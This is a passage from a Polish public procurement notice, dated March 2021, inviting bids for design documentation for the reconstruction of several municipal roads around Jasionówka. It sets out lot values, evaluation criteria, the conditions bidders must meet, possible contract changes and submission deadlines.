1357B do asfaltu w m. Krzywa (obecnie nawierzchnia żwirowo-gruntowa); </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 22246,81 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-10-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty zamawiający będzie się kierował następującymi kryteriami oceny ofert i ich znaczeniem:1) cena ofertowa brutto - 60%2) doświadczenie projektanta w specjalności drogowej – 40%	gdzie 1% = 1 pktAd 1) ocena ofert w kryterium „cena ofertowa” (C) nastąpi wg następującego wzoru:C = (C min ÷ C o) x 60 pktgdzie:C – liczba punktów w kryterium ceny ofertowejC min – najniższa cena spośród ofert nieodrzuconychC o – cena oferty badanejOferta może uzyskać w zakresie kryterium ceny ofertowej (C) maksymalnie 60 punktów.	Ad 2) kryterium „doświadczenie projektanta w specjalności drogowej” „D”Ocena ofert w kryterium „doświadczenie projektanta w specjalności drogowej” dotyczy doświadczenia osoby skierowanej do realizacji niniejszego zamówienia jako projektanta posiadającej odpowiednie uprawnienia do projektowania w specjalności drogowej , która wykonała dokumentacje projektowe dotyczące projektu budowy lub przebudowy, lub rozbudowy drogi / ulicy publicznej , będzie przeprowadzona zgodnie z formułą: 2 opracowania dokumentacji projektowej, o której mowa wyżej – 0 pkt, 3-4 opracowania dokumentacji projektowej, o której mowa wyżej – 10 pkt, 5-6 opracowań dokumentacji projektowej, o której mowa wyżej – 20 pkt, 7-8 opracowań dokumentacji projektowej, o której mowa wyżej – 30 pkt, 9 i więcej opracowań dokumentacji projektowej, o której mowa wyżej – 40 pkt. Oferta może uzyskać w zakresie kryterium „D” maksymalnie 40 punktów. 2. Za ofertę najkorzystniejszą uznana zostanie oferta, która otrzyma największą liczbę punktów, obliczoną według poniższego wzoru:W = C + Dgdzie: W - wartość punktowa oferty,C - ilość punktów za kryterium: cena ofertowa brutto,D- ilość punktów za kryterium: doświadczenie projektanta w specjalności drogowej,Łącznie oferta może uzyskać maksymalnie 100 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie zawodowe projektanta</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> 1. Przy wyborze oferty zamawiający będzie się kierował następującymi kryteriami oceny ofert i ich znaczeniem:1) cena ofertowa brutto - 60%2) doświadczenie projektanta w specjalności drogowej – 40%	gdzie 1% = 1 pktAd 1) ocena ofert w kryterium „cena ofertowa” (C) nastąpi wg następującego wzoru:C = (C min ÷ C o) x 60 pktgdzie:C – liczba punktów w kryterium ceny ofertowejC min – najniższa cena spośród ofert nieodrzuconychC o – cena oferty badanejOferta może uzyskać w zakresie kryterium ceny ofertowej (C) maksymalnie 60 punktów.	Ad 2) kryterium „doświadczenie projektanta w specjalności drogowej” „D”Ocena ofert w kryterium „doświadczenie projektanta w specjalności drogowej” dotyczy doświadczenia osoby skierowanej do realizacji niniejszego zamówienia jako projektanta posiadającej odpowiednie uprawnienia do projektowania w specjalności drogowej , która wykonała dokumentacje projektowe dotyczące projektu budowy lub przebudowy, lub rozbudowy drogi / ulicy publicznej , będzie przeprowadzona zgodnie z formułą: 2 opracowania dokumentacji projektowej, o której mowa wyżej – 0 pkt, 3-4 opracowania dokumentacji projektowej, o której mowa wyżej – 10 pkt, 5-6 opracowań dokumentacji projektowej, o której mowa wyżej – 20 pkt, 7-8 opracowań dokumentacji projektowej, o której mowa wyżej – 30 pkt, 9 i więcej opracowań dokumentacji projektowej, o której mowa wyżej – 40 pkt. Oferta może uzyskać w zakresie kryterium „D” maksymalnie 40 punktów. 2. Za ofertę najkorzystniejszą uznana zostanie oferta, która otrzyma największą liczbę punktów, obliczoną według poniższego wzoru:W = C + Dgdzie: W - wartość punktowa oferty,C - ilość punktów za kryterium: cena ofertowa brutto,D- ilość punktów za kryterium: doświadczenie projektanta w specjalności drogowej,Łącznie oferta może uzyskać maksymalnie 100 pkt. <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wykonanie dokumentacji projektowej na przebudowę drogi gminnej Nr 104003B od drogi wojewódzkiej Nr 671 - Kąty - do drogi powiatowej Nr 1404B (wieś Jasionóweczka) na odcinku od granicy gminy do drogi powiatowej Nr 1404B (obecnie nawierzchnia żwirowo-gruntowa) </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 39560,64 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-10-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty zamawiający będzie się kierował następującymi kryteriami oceny ofert i ich znaczeniem:1) cena ofertowa brutto - 60%2) doświadczenie projektanta w specjalności drogowej – 40%	gdzie 1% = 1 pktAd 1) ocena ofert w kryterium „cena ofertowa” (C) nastąpi wg następującego wzoru:C = (C min ÷ C o) x 60 pktgdzie:C – liczba punktów w kryterium ceny ofertowejC min – najniższa cena spośród ofert nieodrzuconychC o – cena oferty badanejOferta może uzyskać w zakresie kryterium ceny ofertowej (C) maksymalnie 60 punktów.	Ad 2) kryterium „doświadczenie projektanta w specjalności drogowej” „D”Ocena ofert w kryterium „doświadczenie projektanta w specjalności drogowej” dotyczy doświadczenia osoby skierowanej do realizacji niniejszego zamówienia jako projektanta posiadającej odpowiednie uprawnienia do projektowania w specjalności drogowej , która wykonała dokumentacje projektowe dotyczące projektu budowy lub przebudowy, lub rozbudowy drogi / ulicy publicznej , będzie przeprowadzona zgodnie z formułą: 2 opracowania dokumentacji projektowej, o której mowa wyżej – 0 pkt, 3-4 opracowania dokumentacji projektowej, o której mowa wyżej – 10 pkt, 5-6 opracowań dokumentacji projektowej, o której mowa wyżej – 20 pkt, 7-8 opracowań dokumentacji projektowej, o której mowa wyżej – 30 pkt, 9 i więcej opracowań dokumentacji projektowej, o której mowa wyżej – 40 pkt. Oferta może uzyskać w zakresie kryterium „D” maksymalnie 40 punktów. 2. Za ofertę najkorzystniejszą uznana zostanie oferta, która otrzyma największą liczbę punktów, obliczoną według poniższego wzoru:W = C + Dgdzie: W - wartość punktowa oferty,C - ilość punktów za kryterium: cena ofertowa brutto,D- ilość punktów za kryterium: doświadczenie projektanta w specjalności drogowej,Łącznie oferta może uzyskać maksymalnie 100 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie zawodowe projektanta</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> 1. Przy wyborze oferty zamawiający będzie się kierował następującymi kryteriami oceny ofert i ich znaczeniem:1) cena ofertowa brutto - 60%2) doświadczenie projektanta w specjalności drogowej – 40%	gdzie 1% = 1 pktAd 1) ocena ofert w kryterium „cena ofertowa” (C) nastąpi wg następującego wzoru:C = (C min ÷ C o) x 60 pktgdzie:C – liczba punktów w kryterium ceny ofertowejC min – najniższa cena spośród ofert nieodrzuconychC o – cena oferty badanejOferta może uzyskać w zakresie kryterium ceny ofertowej (C) maksymalnie 60 punktów.	Ad 2) kryterium „doświadczenie projektanta w specjalności drogowej” „D”Ocena ofert w kryterium „doświadczenie projektanta w specjalności drogowej” dotyczy doświadczenia osoby skierowanej do realizacji niniejszego zamówienia jako projektanta posiadającej odpowiednie uprawnienia do projektowania w specjalności drogowej , która wykonała dokumentacje projektowe dotyczące projektu budowy lub przebudowy, lub rozbudowy drogi / ulicy publicznej , będzie przeprowadzona zgodnie z formułą: 2 opracowania dokumentacji projektowej, o której mowa wyżej – 0 pkt, 3-4 opracowania dokumentacji projektowej, o której mowa wyżej – 10 pkt, 5-6 opracowań dokumentacji projektowej, o której mowa wyżej – 20 pkt, 7-8 opracowań dokumentacji projektowej, o której mowa wyżej – 30 pkt, 9 i więcej opracowań dokumentacji projektowej, o której mowa wyżej – 40 pkt. Oferta może uzyskać w zakresie kryterium „D” maksymalnie 40 punktów. 2. Za ofertę najkorzystniejszą uznana zostanie oferta, która otrzyma największą liczbę punktów, obliczoną według poniższego wzoru:W = C + Dgdzie: W - wartość punktowa oferty,C - ilość punktów za kryterium: cena ofertowa brutto,D- ilość punktów za kryterium: doświadczenie projektanta w specjalności drogowej,Łącznie oferta może uzyskać maksymalnie 100 pkt. <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wykonanie dokumentacji projektowej na przebudowę drogi wewnętrznej ul. Knyszyńska w Jasionówce o długości ok. 90 m </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 5000,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-07-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty zamawiający będzie się kierował następującymi kryteriami oceny ofert i ich znaczeniem:1) cena ofertowa brutto - 60%2) doświadczenie projektanta w specjalności drogowej – 40%	gdzie 1% = 1 pktAd 1) ocena ofert w kryterium „cena ofertowa” (C) nastąpi wg następującego wzoru:C = (C min ÷ C o) x 60 pktgdzie:C – liczba punktów w kryterium ceny ofertowejC min – najniższa cena spośród ofert nieodrzuconychC o – cena oferty badanejOferta może uzyskać w zakresie kryterium ceny ofertowej (C) maksymalnie 60 punktów.	Ad 2) kryterium „doświadczenie projektanta w specjalności drogowej” „D”Ocena ofert w kryterium „doświadczenie projektanta w specjalności drogowej” dotyczy doświadczenia osoby skierowanej do realizacji niniejszego zamówienia jako projektanta posiadającej odpowiednie uprawnienia do projektowania w specjalności drogowej , która wykonała dokumentacje projektowe dotyczące projektu budowy lub przebudowy, lub rozbudowy drogi / ulicy publicznej , będzie przeprowadzona zgodnie z formułą: 2 opracowania dokumentacji projektowej, o której mowa wyżej – 0 pkt, 3-4 opracowania dokumentacji projektowej, o której mowa wyżej – 10 pkt, 5-6 opracowań dokumentacji projektowej, o której mowa wyżej – 20 pkt, 7-8 opracowań dokumentacji projektowej, o której mowa wyżej – 30 pkt, 9 i więcej opracowań dokumentacji projektowej, o której mowa wyżej – 40 pkt. Oferta może uzyskać w zakresie kryterium „D” maksymalnie 40 punktów. 2. Za ofertę najkorzystniejszą uznana zostanie oferta, która otrzyma największą liczbę punktów, obliczoną według poniższego wzoru:W = C + Dgdzie: W - wartość punktowa oferty,C - ilość punktów za kryterium: cena ofertowa brutto,D- ilość punktów za kryterium: doświadczenie projektanta w specjalności drogowej,Łącznie oferta może uzyskać maksymalnie 100 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie zawodowe projektanta</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> 1. Przy wyborze oferty zamawiający będzie się kierował następującymi kryteriami oceny ofert i ich znaczeniem:1) cena ofertowa brutto - 60%2) doświadczenie projektanta w specjalności drogowej – 40%	gdzie 1% = 1 pktAd 1) ocena ofert w kryterium „cena ofertowa” (C) nastąpi wg następującego wzoru:C = (C min ÷ C o) x 60 pktgdzie:C – liczba punktów w kryterium ceny ofertowejC min – najniższa cena spośród ofert nieodrzuconychC o – cena oferty badanejOferta może uzyskać w zakresie kryterium ceny ofertowej (C) maksymalnie 60 punktów.	Ad 2) kryterium „doświadczenie projektanta w specjalności drogowej” „D”Ocena ofert w kryterium „doświadczenie projektanta w specjalności drogowej” dotyczy doświadczenia osoby skierowanej do realizacji niniejszego zamówienia jako projektanta posiadającej odpowiednie uprawnienia do projektowania w specjalności drogowej , która wykonała dokumentacje projektowe dotyczące projektu budowy lub przebudowy, lub rozbudowy drogi / ulicy publicznej , będzie przeprowadzona zgodnie z formułą: 2 opracowania dokumentacji projektowej, o której mowa wyżej – 0 pkt, 3-4 opracowania dokumentacji projektowej, o której mowa wyżej – 10 pkt, 5-6 opracowań dokumentacji projektowej, o której mowa wyżej – 20 pkt, 7-8 opracowań dokumentacji projektowej, o której mowa wyżej – 30 pkt, 9 i więcej opracowań dokumentacji projektowej, o której mowa wyżej – 40 pkt. Oferta może uzyskać w zakresie kryterium „D” maksymalnie 40 punktów. 2. Za ofertę najkorzystniejszą uznana zostanie oferta, która otrzyma największą liczbę punktów, obliczoną według poniższego wzoru:W = C + Dgdzie: W - wartość punktowa oferty,C - ilość punktów za kryterium: cena ofertowa brutto,D- ilość punktów za kryterium: doświadczenie projektanta w specjalności drogowej,Łącznie oferta może uzyskać maksymalnie 100 pkt. <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące: 1) zdolności do występowania w obrocie gospodarczym – zamawiający wymaga, aby wykonawcy prowadzący działalność gospodarczą lub zawodową byli wpisani do jednego z rejestrów zawodowych lub handlowych prowadzonych w kraju, w którym mają siedzibę lub miejsce zamieszkania (w szczególności CEIDG lub KRS); 2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów – nie dotyczy; 3) sytuacji ekonomicznej lub finansowej – nie dotyczy; 4) zdolności technicznej lub zawodowej: a) doświadczenie zawodowe: Zamawiający wymaga aby wykonawca wykazał iż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał co najmniej 2 dokumentacje projektowe dotyczące projektu budowy lub przebudowy lub rozbudowy drogi/ulicy o długości odcinka drogi/ulicy min. 0,5 km każda, b) kadra techniczna: Zamawiający wymaga aby Wykonawca wykazał , że będzie dysponował następującymi osobami, które skieruje do realizacji zamówienia: co najmniej jedną osobą posiadającą odpowiednie uprawnienia do projektowania w specjalności drogowej wynikające z postanowień ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U z 2019 r. poz. 1196 ze zmianami) lub równoważne. 2. Zamawiający określając wymogi dla osoby w zakresie posiadanych uprawnień, dopuszcza odpowiadające im uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw członkowskich Unii Europejskiej, Europejskiego Obszaru Gospodarczego oraz Konfederacji szwajcarskiej, w zakresie, którego właściwy organ wydaje decyzję w sprawie uznania kwalifikacji zawodowych na zasadach określonych w ustawie z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2020 r. poz. 220). 3. W przypadku Wykonawców wspólnie ubiegających się o realizację zamówienia powyższe warunki Wykonawcy muszą spełniać łącznie. 4. W celu potwierdzenia spełniania warunku, o którym mowa w ust. 1 pkt 1, wykonawca składa katulany odpis / wydruk z właściwego rejestru / ewidencji. 5. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu na podstawie dokumentów i oświadczeń złożonych przez Wykonawcę. 6. Zamawiający może na każdym etapie postępowania uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia 7. W celu wstępnego potwierdzenia, że wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu, wykonawca składa - do oferty:1) oświadczenie Wykonawcy – zgodnie z zał. nr 2 do SWZ.2) dokumenty, w szczególności zobowiązania, innych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia (wg załącznika nr 4 do SWZ) – jeżeli dotyczy.3) wykaz usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wraz z podaniem ich przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających , czy te usługi zostały wykonane lub są wykonywane należycie (według wzoru określonego w załączniku Nr 6 do SWZ), przy czym dowodami, o których mowa są: a) referencje bądź inne dokumenty wystawione przez podmiot na rzecz, którego usługi były wykonane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane ; b) oświadczenie wykonawcy - jeżeli z uzasadnionej przyczyny o obiektywnym charakterze, wykonawca nie jest w stanie uzyskać dokumentów ww. W przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 4) wykaz osób , skierowanych przez wykonawcę do realizacji zamówienia , odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności, oraz informacji o podstawie dysponowania tymi osobami – wg wzoru stanowiącego załącznik nr 7 do SWZ 4. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana metodą spełnia – nie spełnia w oparciu o dokumenty, oświadczenia i informacje zawarte we właściwych dokumentach wyszczególnionych w Rozdz. XVII SWZ. Z treści dokumentów musi jednoznacznie wynikać, że stawiane warunki Wykonawca spełnił. Niespełnienie warunków określonych w ust. 1 skutkować będzie odrzuceniem oferty. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">INFORMACJA O PODMIOTOWYCH ŚRODKACH DOWODOWYCH zawarto w rozdz.XVIII SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">INFORMACJA O PODMIOTOWYCH ŚRODKACH DOWODOWYCH zawarto w rozdz. XVI-XVII SWZ</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1. Zamawiający żąda złożenia wraz z ofertą oświadczenia, że dokumentacja projektowa będąca przedmiotem zamówienia wykonana zostanie zgodnie z wymogami SWZ oraz obowiązującymi w tym zakresie przepisami.2. Jeżeli wykonawca nie złoży przedmiotowych środków dowodowych lub złożone przedmiotowe środki dowodowe będą niekompletne, zamawiający wezwie do ich złożenia lub uzupełnienia w wyznaczonym terminie nie krótszym niż 5 dni.3. Przepisu ust. 2 nie stosuje się, jeżeli przedmiotowy środek dowodowy służy potwierdzeniu zgodności z cechami lub kryteriami określonymi w opisie kryteriów oceny ofert lub, pomimo złożenia przedmiotowego środka dowodowego, oferta podlega odrzuceniu albo zachodzą przesłanki unieważnienia postępowania.4. Zamawiający może żądać od wykonawców wyjaśnień dotyczących treści przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Oświadczenia, że dokumentacja projektowa będąca przedmiotem zamówienia wykonana zostanie zgodnie z wymogami SWZ oraz obowiązującymi w tym zakresie przepisami. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykonawca składa dokumenty zgodnie z SWZ i Załącznikami do SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) Wykonawcy mogą wspólnie ubiegać się o zamówienie publiczne. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (pełnomocnictwo należy dołączyć do oferty). 2) Dokument pełnomocnictwa określający jego zakres powinien być przedłożony w oryginale lub kopii potwierdzonej za zgodność z oryginałem przez notariusza i podpisany przez mocodawcę (osobę fizyczną lub osoby reprezentujące osobę prawną). 3) Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z podmiotem występującym jako reprezentant pozostałych – pełnomocnikiem. 4) Wypełniając formularz ofertowy oraz inne dokumenty powołujące się na „Wykonawcę” w miejscu „nazwa i adres Wykonawcy” należy wpisać dane dotyczące Wykonawców wspólnie ubiegających się o zamówienie. 5) Wykonawcy ponoszą solidarną odpowiedzialność za wykonanie umowy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wszelkie zmiany niniejszej umowy wymagają formy pisemnej pod rygorem nieważności, w formie pisemnego aneksu podpisanego przez każdą ze stron. 2. Zamawiający przewiduje możliwość dokonania zmian postanowień umowy w następujących przypadkach: 1) zmiany terminu wykonania zamówienia z przyczyn niezależnych od Wykonawcy, 2) ustawowej zmiany stawki podatku VAT 3) zmiany osób upoważnionych do realizacji umowy wskazanych w § 3 4) zmianie siedziby lub nazwy firmy, 5) zmianie osób reprezentujących, 6) ogłoszeniu upadłości, 7) ogłoszeniu likwidacji, 8) zawieszeniu działalności, 9) wszczęciu postępowania układowego, w którym uczestniczy Wykonawca, 10) gdy nowy wykonawca ma zastąpić dotychczasowego wykonawcę w wyniku sukcesji, wstępując w prawa i obowiązki wykonawcy, w następstwie przejęcia, połączenia, podziału, przekształcenia, upadłości, restrukturyzacji, dziedziczenia lub nabycia dotychczasowego wykonawcy lub jego przedsiębiorstwa, o ile nowy wykonawca spełnia warunki udziału w postępowaniu, nie zachodzą wobec niego podstawy wykluczenia oraz nie pociąga to za sobą innych istotnych zmian umowy, a także nie ma na celu uniknięcia stosowania przepisów ustawy, 11) jeżeli konieczność zmiany umowy spowodowana jest okolicznościami, których zamawiający, działając z należytą starannością, nie mógł przewidzieć, o ile zmiana nie modyfikuje ogólnego charakteru umowy a wzrost ceny spowodowany każdą kolejną zmianą nie przekracza 50% wartości pierwotnej umowy, w tym gdy zaistnieją okoliczności niezależne od Stron, uniemożliwiające terminowe wykonanie umowy, w tym wystąpienie siły wyższej; za siłę wyższą uznaje się okoliczności o charakterze zewnętrznym, mające nadzwyczajny charakter, nie dające się przewidzieć, oraz którym nie można zapobiec; w szczególności są to zdarzenia o charakterze katastrof przyrodniczych (np. powodzie, huragany, trzęsienia ziemi) lub nadzwyczajne zaburzenia życia zbiorowego (wojna, stan wyjątkowy, ogłoszenie stanu klęski żywiołowej, stanu epidemii); nie uznaje się za siłę wyższą strajku, wzrostu cen materiałów, wyrobów, urządzeń lub usług, 12) dopuszczalne są również zmiany umowy bez przeprowadzenia nowego postępowania o udzielenie zamówienia, których łączna wartość jest niższa niż 10% wartości pierwotnej umowy, a zmiany te nie powodują zmiany ogólnego charakteru umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-03-15 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć w formie elektronicznej lub w postaci elektronicznej jak opisano w rozdz. VIII SWZ, w terminie do dnia 15.03.2021 r. do godz. 11.00.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-03-15 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-03-03 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na 